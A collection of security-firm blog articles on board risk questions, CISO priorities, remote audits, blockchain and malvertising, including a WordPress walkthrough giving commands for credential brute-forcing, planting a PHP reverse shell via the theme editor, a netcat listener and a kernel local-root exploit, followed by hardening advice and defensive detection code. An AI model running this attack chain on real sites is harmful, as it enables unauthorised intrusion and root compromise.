Governance, Risk, and Compliance (GRC) plays a pivotal role in organizational success by providing a structured and integrated approach to managing an organization's overall performance, addressing risks, and adhering to
Executive leaders and board members are ultimately responsible for ensuring the long-term security of their organization, which helps in mitigating cyber risks. As board members realize how critical risk and security management is, they ask leaders more nuanced and complex questions. Interest in security and risk management (SRM) is at an all-time high at the board level. In 2019, Gartner conducted its security and risk survey and found that four out of five respondents noted that security risk influences decisions at the board level.
The Gartner research helps security and risk management leaders analyze five categories of questions that they should be prepared to answer at any executive or board-level meeting. Here are those questions.
Let’s discuss each of these in detail.
The Trade-Off Question - Are we 100% Secure?
The trade-off question is one that security and risk management leaders struggle with a lot. The question "Are we secure?" needs improvising and is generally asked by board members who are uneducated about and unaware of the impact of security risks on the business. In this scenario, it is impossible to prevent 100% of incidents. The CISO's responsibility is to help identify and evaluate the potential risks for an organization and allocate resources to manage them.
According to Gartner's report, a security and risk management leader in response to this question might say,
"It is impossible to remove all resources of the information risk considering the evolving nature of the cyber threat landscape. My responsibility is to work with other aspects of the business to execute controls for managing security risks that can prevent us from improving operational efficiency and brand image. There is no such thing as 'perfect protection' in security. We have to reassess continually how much risk is appropriate as the business grows. We aim to develop a sustainable program to balance the requirements to protect against the needs to run a business”.
The Landscape Question - How bad is it out there?
Most board members want to know how their security compares to that of peer organizations. They read threat reports and blogs, listen to broadcasts, and are even forced by regulation to understand such things. Gartner recognizes the need to discuss this landscape. Leaders should, to the extent possible, avoid trying to quantify risks and attaching budget figures to the mitigation cost based on something external. Moreover, while benchmarks give some material for conversation, they must be a negligible factor in the decision-making process.
Here are some responses that security and risk management leaders can give while discussing the wider security landscape.
| External Events | Responses |
| --- | --- |
| Our primary competitor experienced a public, successful attack. | We have a similar vulnerability that can facilitate the attack, and we are addressing that weakness. Enhanced monitoring abilities have been implemented. |
| There is an increased number of attacks against the electricity grids in three of the national presence points. | We don't expect to become a direct target. Business continuity plans are being tested and updated to overcome the prolonged outage. |
| We fall under the scope of the new EU General Data Protection requirements. | We have conservative and cautious privacy practices in place. |
The Risk Question - Do we know what our risks are?
A risk outside the tolerance needs an antidote to bring it within tolerance. It does not require dramatic changes in a short time, so beware of overreacting. In the Gartner report, they present a way to defend the risk management decision, and you can change it according to your organization's risk tolerance.
One of the most common issues encountered in the report is that the evaluations are subjective and depend on flawed methodology. Security leaders must have evidence to support the evaluation, even when they are not called to present it. Another aspect that needs to be considered is whether to depict the typical outcome or the worst. For instance, most incidents have mild outcomes that are within the ability of most companies to absorb. However, an infrequent incident can result in a catastrophic outcome.
The Performance Question - Are we appropriately allocating resources?
Security is always a moving target. The security team needs to demonstrate its behavior to ensure the organization stays safe. It is particularly important to figure out whether resources are allocated appropriately and where the money is spent. The original strategy proposal should have margins for error concerning the deadline and the budget. As long as overruns stay within these margins, they must be noncontroversial.
There may be valid reasons even if the overruns are outside the margins. The balanced scorecard approach is a way to understand how security contributes to business performance. In this approach, the top layer defines the business aspiration, and organization performance against those aspirations is expressed using a traffic light mechanism. However, it's not the only way. Some organizations have different types of dashboards to discuss business performance.
The Incident Question - How did this happen?
An incident is unavoidable, and treatment is a blessing in disguise. Security and risk management leaders should be aware that in some scenarios, incident details may have been tightly controlled (such as sensitivities associated with the incident). Using the fact-based approach and explaining your knowledge will eliminate the mystery and give confidence that you have control over the incident. Acknowledging the incident provides details on the business impact, outlines the flaws or gaps needed to work out, and offers a mitigation plan.
Decipher Complex Board Question
There are usually no deterministic answers to board questions, and responses are generally more about showing options for sponsorship than a definitive course of action. The options can vary based on the context of the discussion, the maturity of the board, the communication skills of the SRM leader, and the frequency of reporting. However, understanding and answering board questions requires everyone to understand their roles. Therefore, the SRM leader should know that the board is interested in facilitating the business goal. Any query that may seem immature, ignorant, or complicated has a purpose behind it.
Wishing you all a very happy 2021; may it be a year filled with success, good health, and happiness for you and all your loved ones. With the year 2020 and the pandemic overwhelming us, we must be conscious of the increase in cyber security threats that are looming in front of us. Here are a few thoughts and considerations for the unenviable role of the CISO for a great start to 2021!
Make the management part of your problem
Senior management does not know the technicalities of how a breach occurs, nor should they need to know. However, they should be clearly aware of the risks thereof. Ensure that the senior management/board is completely up to date on all risks. Increase the frequency of your meetings and provide a crisp update of the open risks and how you are working to mitigate them, with clearly established timelines and dependencies. Costs and budget overruns should be highlighted ahead of time. Bring in business-friendly and business-relevant cyber security metrics and report them periodically. This way the management is more forthcoming in providing the necessary authority and helping to prioritize your initiatives.
Get the Appropriate Budget
Budget definition and allocation can be based on a percentage of IT spend, a percentage of the cost of a breach, or a percentage of business growth YOY; various models exist. While each has its benefits and pitfalls, the budget should be commensurate with your risk appetite. Continuing from the point above, having the management 'onboard' with cyber security initiatives will go a long way in ensuring that an appropriate budget is allocated. Let us be clear about one thing: the world expects 'more' with 'less'.
Clearly Identify your Security Partners
Cyber security is one of the top fields where the gap between available skills and market needs is widening. It is expected that with the CAGR of 17% in cyber security (products and services), this area can quickly become the CISO's nightmare. Relying on experts to do the job is also essential. This problem can be solved by engaging the right ecosystem partners to do your job. Security technologies, security governance, and security operations are niche areas, and picking the right partner will ensure that they stay with you, provide you the much-needed assurance, and help address your problem by bringing in the right skills. Remember, it is not required to boil the ocean.
Evolve Your Security to Protect Your Remote Infrastructure
Secure your remote workforce by proactively protecting against zero-day malware and phishing, and consider both human and technological factors to avoid falling victim to phishing attacks. In response to the coronavirus pandemic, Gartner analysts observed a more than 400% increase in client inquiries related to remote access technologies for the months of March, April, and May in 2020, compared to the previous three months. Furthermore, a recent Gartner survey reveals that 41% of employees are likely to work remotely after the coronavirus pandemic.
Continuous Monitoring for all Critical Assets
90% of breaches in cloud-based infrastructure were due to configuration-related issues. Periodic assessment (like once a year or once a quarter) may not be sufficient in today's scenario. The new buzzword is continuous monitoring. Continuous monitoring of critical assets enables rapid detection of compliance issues and security risks within the IT infrastructure that could lead to compliance violations. This helps in understanding real-time changes to the infrastructure, and with a good threat intelligence feed and effective continuous monitoring it is possible to address zero-day attacks much more robustly.
The global situation relating to the COVID-19 pandemic has impacted business and has also impacted the work of auditors. The current situation challenges the conventional methods adopted for an audit. The current uncertainty and unpredictability may create risks of material misstatement in audits.
“Predicting the unpredictable: Adapting to the changing needs” has always been a key mantra, and this holds true today with the emergence of COVID-19.
Considering the recent situation and the paradigm shift in business operations, CyRAACS would advise audit teams to adopt the methods below for a precise, fact-based audit.
1. Re-evaluate the audit scope
With the change in the mode of business operations and the technology implemented, auditors may have to relook at the scope of the audit. Include the technology and architecture deployed to support remote working. Auditors may have to re-evaluate the effort estimates and timelines based on the changes in the scope of the audit.
2. Utilize Collaboration tools and communicate
Conference or video call facilities or collaboration tools such as Skype, Teams, Slack, etc. allow for regular communication with clients and team members. Extensively use collaboration tools to communicate what you need and what you have been working on. An additional point to note while implementing these communication and collaboration technologies is to keep an eye on the advisories issued with the vulnerabilities identified in these technologies. Any open-source tools adopted may be evaluated for any security flaws before implementation.
3. Use cloud services for storing evidence
Utilize cloud storage services to collect audit evidence. Cloud services like OneDrive and SharePoint enable gathering adequate, appropriate audit evidence remotely. Ensure all security controls are implemented in the cloud service being used, to prevent any data leakage. Additionally, ensure that the cloud platform being used is accessible to all stakeholders required to provide data for the audit.
4. Technology controls to be stringently implemented by the IT Team
In the event of the recent crisis and the work from home model adopted globally, the IT team may be evaluating stricter and stringent controls on implementing digital certificates, Multi-Factor Authentication to the environment, etc. Auditors may integrate the additional security controls in their methodology to adapt to the changing environment.
5. Check for regulatory/contractual requirements for evidence sharing
All the regulatory requirements for data hosting, data sharing may be validated before sharing the data with the auditors. In the case of strict organizational policies on data sharing, organizations may create a segment or a white room for the auditors to securely review the evidence.
6. Centralize work performed by other auditors
Centralize the audit engagement and the documentation on the cloud platform. This would enable the audit team to coordinate and review the work of auditors to meet the requirements in auditing and reporting standards.
7. Flexibility in reporting audit findings
As audit teams respond to the crisis and changing business risks in differing ways, there may arise a need for more adaptable and flexible auditing techniques. During this period, auditors may not be restricted to the traditional reporting methods and may consider different reporting templates like unrated reporting, e-mail reporting, and mid-review reporting.
8. Reassess key risks in a real-time environment
Risk changes rapidly with the slightest change in the environment. Reassess the current environment to identify the new threat landscape and associated risks. The exercise gives insights into the changing risk landscape and aids in developing a robust risk mitigation strategy.
Additional Articles for a good read and understanding of global security controls and audits:
1. NBS Special Publication 500-153: Guide to Auditing for Controls and Security: A System Development Life Cycle Approach
2. NIST Special Publication 800-53 A: Assessing Security and Privacy Controls in Federal Information Systems and Organizations.
In conclusion, conducting a cybersecurity audit in the midst of a crisis is essential to ensure that an organization’s data and systems are secure. It is important for organizations to be aware of best practices for such audits, in order to successfully mitigate risks and vulnerabilities during times of uncertainty. Preparing for potential cyber threats by strengthening security protocols should be considered as part of any crisis plan. Organizations must also remain vigilant and monitor their systems on an ongoing basis, so as to detect possible threats before they become a problem.
WordPress is a free and open-source PAAS structure that is being used by millions across the globe as a content management system. Its features include the integration of various plugins and themes.
Also, there are many vulnerabilities associated with the plugins and themes being used within WordPress to date. According to the statistics, 73.2% of the most popular WordPress installations are vulnerable to date. These can be identified using automated tools and can be exploited. One such example is explained in this blog on how an adversary can gain root access by exploiting a vulnerability present inside the WordPress theme engine.
Below are the steps to perform Privilege escalation for a vulnerable WordPress theme engine:
Run Nmap enumeration scan to discover the open ports and services running on the target host.
Nmap reveals HTTP service running on port 80. Also, the directories discovered in the HTTP-enum scan points to the WordPress login page.
Browse to the login page of WordPress http://*target IP*/wp-login as shown in the screenshot below:
Now, to retrieve the username and password we need to run a brute-force scan using WPScan.
WPScan is a scanner built for enumerating and brute-forcing the usernames and passwords for WordPress.
Let us first run a user enumeration scan to discover the user accounts linked with WordPress using the below command:
wpscan --url *target IP* --enumerate u
The user enumeration scan reveals the usernames of the users linked with WordPress account as shown in the screenshot below:
Now that we have the username, we shall run a brute-force scan to enumerate the password for the admin account, for which we use the below command:
wpscan --url *target IP* --wordlist /root/rockyou.txt --username admin
As shown in the below screenshot, as part of the brute force scan we get the username and password for the admin account. The password for the admin account is princess.
Using the username and password obtained from WPScan, we log in to the WordPress site and navigate to the themes section. WordPress plugins and themes are the vulnerable points for any WordPress website.
After login navigate to Appearance>Themes>Editor
Now, we observe that there are multiple .php files in the templates and archives section. We could use any of these to upload the PHP reverse shell. For example, we will try to use archive.php file to upload the PHP reverse shell.
Replace the contents of the archive.php file with our PHP reverse shell.
In this case, let us use a PHP reverse shell that is downloaded from pentest monkey.
Run the below command and download the shell:
wget http://pentestmonkey.net/tools/web-shells/php-reverse-shell/ php-reverse-shell-1.0.tar.gz
Unzip the file using $tar -xzf php-reverse-shell-1.0.tar.gz command and copy the contents of the file in archive.php file in the browser.
The IP address and port should point to the attacking system’s IP and listener port as shown in the screenshot below:
Click on the update file button at the bottom of the page and we observe that the file gets updated successfully with the PHP reverse shell code.
Now, open a new terminal and start a netcat listener on port 443 which is specified in the PHP reverse shell script using the below command:
nc -nvlp 443
Now, navigate to the modified archive.php in the browser using the below link:
http://*target IP*/wp-content/themes/twentytwelve/archive.php
As shown in the screenshot below, after traversing to the modified archive.php file in the web browser we get a low privilege reverse shell from the attacking system's IP to the victim's IP.
We got a low privilege access for webserver user “www-data”.
The next step is to elevate the privilege and get root access.
Let us run a Linux privilege checker python script to enumerate the system info and check for the world-writable files.
For that run python server using the below command to transfer file from attacker’s system to target system
python -m SimpleHTTPServer 80
Download the linuxprivchecker.py file into the tmp directory of the target system using the below command
wget http://*local IP*/linuxprivchecker.py
After enumerating we also know that the world-writable directory is the tmp directory for the user www-data.
We know that the Linux version in use is Linux 2.6.32. Let us download a python script from exploitdb named as Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) – ‘CAN BCM’ Local Privilege Escalation.
Download the script in the world-writable directory “tmp” which was discovered as part of the enumeration scan.
This script might be helpful in elevating from local privilege to root privilege.
Compile the script using the below command and save it in the output file named as rootpriv:
gcc 14814.c -o rootpriv
Now, run the output file using ./rootpriv command.
Once the script has executed successfully, check the current user using whoami.
We get access to the ROOT account as shown in the below screenshot:
Check for the files present in the root directory.
There is an interesting file wp.sql which has all the database tables and values in it which could be used to craft SQL injection attacks. Below are the contents of wp.sql file:
The blog summarizes how a user can gain root access using a vulnerable WordPress theme engine.
There are many other loopholes in WordPress that can be used to elevate privilege and retrieve sensitive information.
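Seen from the defender's side, the chain described in this walkthrough (password guessing against wp-login.php, a theme file changed through the admin editor, then a direct request to that theme file) leaves a recognisable sequence in the web server's access log. The following Python detector is an added example, not part of the original post; the combined log format, the thresholds, the stage names, the IP addresses and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined Log Format (assumed): ip - - [time] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Theme templates are normally loaded through index.php, so a direct hit on a
# .php file under wp-content/themes/ is unusual and worth a look.
THEME_PHP_RE = re.compile(r"^/wp-content/themes/[^/]+/[^?]+\.php(\?|$)")

LOGIN_THRESHOLD = 5            # assumed: failed logins inside WINDOW before flagging
WINDOW = timedelta(minutes=5)  # assumed sliding window
CHAIN = [
    "login_bruteforce",
    "login_success_after_bruteforce",
    "theme_file_edited",
    "direct_theme_php_request",
]


def parse(line):
    """Return (ip, timestamp, method, path, status) or None for unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"], int(m["status"])


def detect(lines):
    """Return {ip: [stage, ...]} with stages in the order they were first seen."""
    failures = defaultdict(list)  # ip -> timestamps of recent failed logins
    stages = {}

    def mark(ip, stage):
        seen = stages.setdefault(ip, [])
        if stage not in seen:
            seen.append(stage)

    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, ts, method, path, status = rec
        base = path.split("?", 1)[0]
        if method == "POST" and base == "/wp-login.php":
            # Assumption: stock WordPress answers a failed login with 200
            # (form re-rendered) and a successful one with a 302 redirect.
            if status == 200:
                recent = [t for t in failures[ip] if ts - t <= WINDOW] + [ts]
                failures[ip] = recent
                if len(recent) >= LOGIN_THRESHOLD:
                    mark(ip, "login_bruteforce")
            elif status == 302 and "login_bruteforce" in stages.get(ip, ()):
                mark(ip, "login_success_after_bruteforce")
        elif method == "POST" and base == "/wp-admin/theme-editor.php":
            mark(ip, "theme_file_edited")
        elif THEME_PHP_RE.match(path) and status == 200:
            mark(ip, "direct_theme_php_request")
    return stages


def full_chain(findings):
    """IPs that went through every stage of the chain, in order."""
    return [ip for ip, seen in sorted(findings.items()) if seen == CHAIN]


def _line(ip, hhmmss, method, path, status):
    return (f'{ip} - - [12/Mar/2021:{hhmmss} +0000] '
            f'"{method} {path} HTTP/1.1" {status} 512 "-" "-"')


# Constructed sample log: one ordinary user, then one client walking the chain.
SAMPLE_LOG = (
    [
        _line("198.51.100.7", "10:00:05", "POST", "/wp-login.php", 200),
        _line("198.51.100.7", "10:00:20", "POST", "/wp-login.php", 302),
        _line("198.51.100.7", "10:00:25", "GET",
              "/wp-content/themes/twentytwelve/style.css", 200),
    ]
    + [_line("203.0.113.50", f"10:01:{s:02d}", "POST", "/wp-login.php", 200)
       for s in range(6)]
    + [
        _line("203.0.113.50", "10:01:07", "POST", "/wp-login.php", 302),
        _line("203.0.113.50", "10:03:00", "POST", "/wp-admin/theme-editor.php", 200),
        _line("203.0.113.50", "10:03:30", "GET",
              "/wp-content/themes/twentytwelve/archive.php", 200),
    ]
)

if __name__ == "__main__":
    for ip, seen in detect(SAMPLE_LOG).items():
        print(ip, " -> ".join(seen))
```

Each stage is also useful as a separate alert: a POST to theme-editor.php is rare on a production site, and once the file editor is disabled it should not succeed at all.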
Below are the measures you can adopt to keep your WordPress site secure:
1. Sucuri Scanner
Install and use WordPress security plugin – Sucuri Scanner.
We need to set up an auditing and monitoring system that keeps track of everything that happens on the website. This includes file integrity monitoring, failed login attempts, malware scanning, etc.
The best part about Sucuri’s firewall is that it also comes with a malware cleanup and blacklist removal guarantee. Basically, if you were to be hacked under their watch, they guarantee that they will fix your website (no matter how many pages you have).
2. Change the Default “admin” username.
In the old days, the default WordPress admin username was “admin”. Since usernames make up half of the login credentials, this made it easier for hackers to do brute-force attacks.
Since WordPress doesn’t allow you to change usernames by default, there are three methods you can use to change the username.
3. Disable File Editing
WordPress comes with a built-in code editor which allows you to edit your theme and plugin files right from your WordPress admin area. In the wrong hands, this feature can be a security risk which is why we recommend turning it off.
4. Add Two Factor Authentication
The two-factor authentication technique requires users to log in by using a two-step authentication method. The first one is the username and password, and the second step requires you to authenticate using a separate device or app.
Most top online websites, such as Google, Facebook, and Twitter, allow you to enable it for your accounts. You can also add the same functionality to your WordPress site.
5. Strong Passwords and User Permissions
Many systems and applications include functionality that prevents a user from setting a password that does not meet certain criteria. Functionality such as this should be leveraged to ensure only strong passwords are being set.
6. Keep WordPress Updated
Since WordPress is open-source, anyone can study the source code to learn and improve it. You need to make sure that all your WordPress plugins, themes, and the core itself are always up to date.
7. Disable Directory Indexing and Browsing
Directory browsing can be used by hackers to find out if you have any files with known vulnerabilities, so they can take advantage of these files to gain access. Directory browsing can also be used by other people to investigate your files, copy images, find out your directory structure, and other information. Therefore, it is highly recommended that you turn off directory indexing and browsing.
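Three of the measures above (file integrity monitoring, disabling file editing, and disabling directory indexing) can be checked mechanically. The following Python audit is an added example, not part of the original post; it assumes an Apache-style install with wp-config.php and .htaccess in the WordPress root, and the finding names, the function names and the constructed directory tree in demo() are hypothetical.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# define('DISALLOW_FILE_EDIT', true); in wp-config.php removes the built-in
# theme/plugin editor. Lines commented out with // or # do not match.
FILE_EDIT_RE = re.compile(
    r"""^[ \t]*define\(\s*['"]DISALLOW_FILE_EDIT['"]\s*,\s*true\s*\)\s*;""",
    re.IGNORECASE | re.MULTILINE,
)
# Apache directive that switches directory listings off.
NO_INDEX_RE = re.compile(
    r"^[ \t]*Options\b[^\n#]*(?<!\S)-Indexes\b", re.IGNORECASE | re.MULTILINE
)


def hash_theme_files(wp_root):
    """Map each theme .php file (path relative to wp_root) to its SHA-256."""
    root = Path(wp_root)
    themes = root / "wp-content" / "themes"
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(themes.rglob("*.php"))
    }


def audit(wp_root, baseline):
    """Return a list of findings for the install at wp_root.

    baseline is a manifest produced earlier by hash_theme_files() on a
    known-good copy and stored where the web server user cannot write to it.
    """
    root = Path(wp_root)
    findings = []

    config = root / "wp-config.php"
    if not config.is_file() or not FILE_EDIT_RE.search(
        config.read_text(errors="replace")
    ):
        findings.append("file-editor-enabled")

    htaccess = root / ".htaccess"
    if not htaccess.is_file() or not NO_INDEX_RE.search(
        htaccess.read_text(errors="replace")
    ):
        findings.append("directory-indexing-not-disabled")

    current = hash_theme_files(root)
    for rel in sorted(set(baseline) | set(current)):
        if rel not in current:
            findings.append(f"theme-file-missing:{rel}")
        elif rel not in baseline:
            findings.append(f"theme-file-added:{rel}")
        elif baseline[rel] != current[rel]:
            findings.append(f"theme-file-modified:{rel}")
    return findings


def demo():
    """Audit a constructed tree before and after hardening plus one file change."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        theme = root / "wp-content" / "themes" / "twentytwelve"
        theme.mkdir(parents=True)
        (theme / "archive.php").write_text("<?php get_header(); ?>\n")
        (theme / "index.php").write_text("<?php get_header(); ?>\n")
        (root / "wp-config.php").write_text("<?php\ndefine('DB_NAME', 'wp');\n")
        (root / ".htaccess").write_text("Options +Indexes\n")
        baseline = hash_theme_files(root)
        before = audit(root, baseline)

        # Apply measures 3 and 7, then change a template the way the theme
        # editor would, to show the integrity check catching it.
        (root / "wp-config.php").write_text(
            "<?php\ndefine( 'DISALLOW_FILE_EDIT', true );\n"
        )
        (root / ".htaccess").write_text("Options -Indexes\n")
        (theme / "archive.php").write_text("<?php /* changed */ ?>\n")
        after = audit(root, baseline)
        return before, after


if __name__ == "__main__":
    before, after = demo()
    print("before hardening:", before)
    print("after hardening :", after)
```

Directory listings may also be disabled in the main server configuration rather than in .htaccess, so the second finding means only that the directive was not found in that file.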
Blockchain is an emerging technology that is quite popular nowadays due to the popularity of cryptocurrency. Apart from blockchain being used in cryptocurrency, it is also marketed as a cure for a lot of things including cybersecurity. Blockchain is considered to be a nearly impenetrable technology as by design, blockchain is resistant to modification of the data. The blockchain contains a list of records or blocks which are linked using cryptography. Each of those individual records/blocks contains information and data that are combined together and verified. Information such as a cryptographic hash function of the previous block, timestamp, and transaction details are permanently recorded in a distributed ledger. The ledger is decentralized in nature, all transactions are done across a peer-to-peer network. Blockchain technology is designed in such a way that there is no central authority or storage location. Every user on the network plays a part in storing some or all of the blockchain. Everyone is responsible for verifying the data that is stored and/or shared to make sure false data cannot be added and existing data cannot be removed.
Blockchain technology has been around for more than a decade. It was invented by a person using the name Satoshi Nakamoto in 2008 to serve as the public transaction ledger of the cryptocurrency bitcoin. However, as the technology has gradually spread worldwide, people have begun using it in a variety of ways in numerous industries, including as a means to increase cybersecurity. Blockchain is a chain of records that leads to the formation of a distributed network that can have millions of users all over the world. Every user can add information to the blockchain, and all data in the blockchain is secured through cryptography. Every other member of the network is responsible for verifying that the data being added to the blockchain is real. This is done using a system of three keys (private, public, and the receiver's key) that allow members to check the veracity of the data while also confirming whom it comes from. The verified data then forms a block and is added to the chain of data. In order to make updates to a particular piece of data, the owner of that data must add a new block on top of the previous block, creating a very specific chain of code.
The network being accessed by an unauthorized person can lead to data being either stolen or damaged. Hence, it becomes essential for an individual or organization to determine the invasion. The mode of collecting and preserving evidence has a significant role to play in ensuring that the evidence is accountable in the courtroom during various situations such as lawsuits or criminal complaints.
Identifying the attack/breach and generating the required documents about the causes of cyber-attack or cyber fraud can be accountable through the use of blockchain technology. Truth-based evidence is always important in any cybercrime investigation. Digital evidence moves down the hierarchy through the chain of custody in the different levels of transactions in any investigation process. Blockchain technology can provide a clear and exhaustive view of the transactions that have taken place concerning the evidence, right from the time the evidence originated from the source [2].
There are many reported cases of missing police evidence, and several of them go unaccounted for, giving criminals an easy way out. Such things can also be prevented using blockchain technology. It can enable appropriate authorization for those who are permitted to enter the evidence room, whether electronic, magnetic, or by using private keys. The scientific approach in digital forensics flows through the search authorities, the chain of custody of evidence, imaging and hashing functions, validation of data using appropriate tools, report-ability, and repetition of presentation. The entire process can be made data-centric using blockchain technology.
The hash validation with the blockchain and the timestamp will prevent repeatability and contamination of information. Keeping a clear and unique track of who accessed what and when will help to avoid the contamination of evidence and information. A blockchain technology-based application can be used to ensure proper operating practice when it comes to evidence management. Necessary questions, like how the core data is stored, how it is communicated, who is responsible for handling the data, and which factors contribute to the physical security of the data, can all be streamlined efficiently. Ideas such as working with the duplicate copy and not with the original can be validated using the hash. The hash function takes the data and generates a fixed-size bit sequence as output, thus creating a digital fingerprint of the input data.
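The custody record described above can be illustrated with a hash-linked ledger. The following Python code is an added example, not part of the original article: it is a single-node hash chain without the distributed consensus of a real blockchain, and the class, field names, actors, timestamps and evidence bytes are constructed for illustration.

```python
import hashlib
import json

GENESIS = "0" * 64  # prev_hash of the first block


def sha256_hex(data: bytes) -> str:
    """Fixed-size digital fingerprint of the input data."""
    return hashlib.sha256(data).hexdigest()


def block_hash(block: dict) -> str:
    """Hash every field except the block's own hash, in a canonical encoding."""
    body = {k: v for k, v in block.items() if k != "hash"}
    encoded = json.dumps(body, sort_keys=True, separators=(",", ":")).encode()
    return sha256_hex(encoded)


class CustodyLedger:
    """Append-only record of who handled a piece of evidence, and when."""

    def __init__(self):
        self.blocks = []

    def record(self, evidence: bytes, actor: str, action: str, timestamp: str) -> dict:
        block = {
            "index": len(self.blocks),
            "timestamp": timestamp,
            "actor": actor,
            "action": action,
            "evidence_sha256": sha256_hex(evidence),
            "prev_hash": self.blocks[-1]["hash"] if self.blocks else GENESIS,
        }
        block["hash"] = block_hash(block)
        self.blocks.append(block)
        return block

    def verify(self):
        """Return the index of the first inconsistent block, or None if intact."""
        prev = GENESIS
        for i, block in enumerate(self.blocks):
            if (
                block["index"] != i
                or block["prev_hash"] != prev
                or block["hash"] != block_hash(block)
            ):
                return i
            prev = block["hash"]
        return None

    def copy_matches_original(self, working_copy: bytes) -> bool:
        """A working copy is valid only if it hashes to the acquisition value."""
        return bool(self.blocks) and (
            sha256_hex(working_copy) == self.blocks[0]["evidence_sha256"]
        )


def demo():
    image = b"constructed disk image bytes"  # stands in for the acquired image
    ledger = CustodyLedger()
    ledger.record(image, "officer.a", "acquired", "2021-03-12T10:00:00Z")
    ledger.record(image, "lab.b", "imaged working copy", "2021-03-12T11:30:00Z")
    ledger.record(image, "analyst.c", "analysis started", "2021-03-13T09:00:00Z")
    intact = ledger.verify()

    # Someone rewrites a past entry: the stored hash no longer matches.
    ledger.blocks[1]["actor"] = "someone.else"
    edited = ledger.verify()

    # Re-hashing the edited block does not help: the next block still points
    # at the old hash, so the break simply moves one block forward.
    ledger.blocks[1]["hash"] = block_hash(ledger.blocks[1])
    rehashed = ledger.verify()
    return intact, edited, rehashed


if __name__ == "__main__":
    print(demo())
```

Someone holding the only copy of such a ledger could still recompute every later block; replicating the chain across independent parties, as the article describes for blockchain networks, is what removes that option.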
The number of people joining the world wide web is continuously growing and technology is developing at a very fast rate; as more data gets produced, more hackers will attempt to steal or corrupt that data. The technology behind blockchain is flexible and unbelievably helpful for the future of the Internet, permitting users to better secure their data. Innovative uses for blockchain technology are already becoming a part of other fields beyond cryptocurrencies and can be especially useful to boost cybersecurity. Blockchain implementation can help forestall many threats and attacks on a system and can prevent information from being stolen or destroyed. Some of the things that blockchain can help with are: –
I. Preventing Fraud and Theft of data: – Blockchain technology provides some of the best protection for data against hackers by preventing potential fraud and decreasing the chance of data being stolen or compromised. In order to destroy or modify a blockchain, a hacker would have to destroy the data stored on every user's computer in the global network. This could be millions of computers, with each one storing a copy of some or all the data. Bigger blockchain networks with more users have an infinitely lower risk of getting attacked by hackers because of the complexity required to penetrate such a network.
II. Preventing Distributed Denial of Service (DDoS) Attacks: – Hackers can use several techniques to launch an attack; the most common is sending a large number of requests/packets to the system until the system becomes unable to process them, leading to the failure/crash of the system. DDoS attacks have been happening at an increased frequency recently, affecting bigger companies like Twitter, Spotify, SoundCloud, and more. The current difficulty in preventing DDoS attacks comes from the existing Domain Name System (DNS). The fact that it is only partially decentralized means that it is still vulnerable to hackers, because they are able to target the centralized part of DNS and continue crashing one website after another. Implementing blockchain technology would fully decentralize DNS, distributing the contents to a large number of nodes and making it nearly impossible for hackers to attack. Domain editing rights would only be granted to those who need them (domain owners) and no other user could make changes, significantly reducing the risk of data being accessed or changed by unauthorized parties.
III. Decentralized Storage Solutions: –
Data is becoming more valuable than gold and oil. Every business and individual accumulates tons of sensitive data about themselves or their customers. Unfortunately, this data is also quite attractive to hackers, and one of the most convenient things you can do for cybercriminals is to store all of it in one place. Businesses are mainly still using centralized storage when it comes to data. Blockchain-based storage solutions are slowly gaining popularity. An example is Apollo data cloud, developed by the Apollo Currency team, which allows users to archive data on the blockchain and grant permission for access to third parties. The cryptographic access key can be revoked at any time, further reducing the risk of a breach. Thanks to the decentralized nature of blockchain technology, hackers no longer have a single point of entry, nor can they access entire repositories of data in the event that they do get in.
Malvertisements are malicious advertisements distributed in the same way as legitimate online advertisements. Malvertising is one of the common practices used to spread malware. Cybercriminals use the advertising strategy by posing as legitimate campaigns. These malvertisements will either attempt to download malware directly onto visitors' systems/devices or redirect visitors to websites meant to spread ransomware, viruses, or other malicious programs. The process of creating malvertisements and spreading malware is called malvertising. Malvertising is a favoured medium for criminal behaviour as it takes advantage of consumer trust in both the companies running campaigns and the advertising networks.
Ad networks are responsible for distributing both real and fraudulent advertisements. The reliability of a website does not necessarily determine, and has to some extent been irrelevant to, whether or not it will contain malvertisements. That said, reliable sites are still the best place to be to avoid being infected by malvertisements. Recent examples have proven that even the most well-known, legitimate sites can distribute malvertisements unknowingly. In recent years, reputed sites such as Forbes, The New York Times Online, London Stock Exchange, Spotify, etc. have all been negatively impacted by malvertising campaigns that infected visitors with malware.
People in general confuse malvertisements with adware, as both affect online advertisements. Adware is a program running on a victim's or user's system that is packaged with other legitimate software. Adware displays unwanted advertising, redirects search requests to advertising websites, and mines data about the user to help target or serve advertisements.
Key differences between malvertisements and adware are:
1. Malvertisements involve deploying or injecting malicious code on a publisher’s web page, so their target audience is not individual or selected users. Adware, however, is only used to target individual users.
2. Malvertisements are only dangerous to, and only affect, users who view the infected webpage or website, whereas adware, once installed, keeps on operating on the user’s computer.
Malvertisements are distributed via the same methods as normal online advertisements. Infected graphic files are submitted to a legitimate advertisement network in the hope that the advertiser won’t be able to differentiate between trustworthy ads and harmful ones. Advertisements generally attract and encourage viewers to click. Once approved by the advertisers, these malicious advertisements are added to or distributed on legitimate sites. In some cases, cybercriminals will even re-register expired, but previously legitimate, domains to disguise themselves as trustworthy domains. Criminals can use redirects to send clickers to a malicious site, and users remain ignorant because they expect redirects when clicking on an ad. While the user is on the malicious website, code runs in the background and attempts to download malware onto the device. This unintentional download of a virus or malicious code is known as a drive-by download. Malvertisements often use drive-by attacks to download ransomware onto targeted computers. Advanced forms of malvertisements can even install malware on visitors’ devices directly from the legitimate website that is displaying the ad, without any interaction from visitors.
Attackers use several delivery mechanisms to insert their malicious code into advertisements.
1. Malware in advertisement calls: When a website shows a page featuring an ad, the ad exchange delivers advertisements to the user through a variety of third parties. An attacker who compromises one of these third-party servers can attach malicious code to the ad payload.
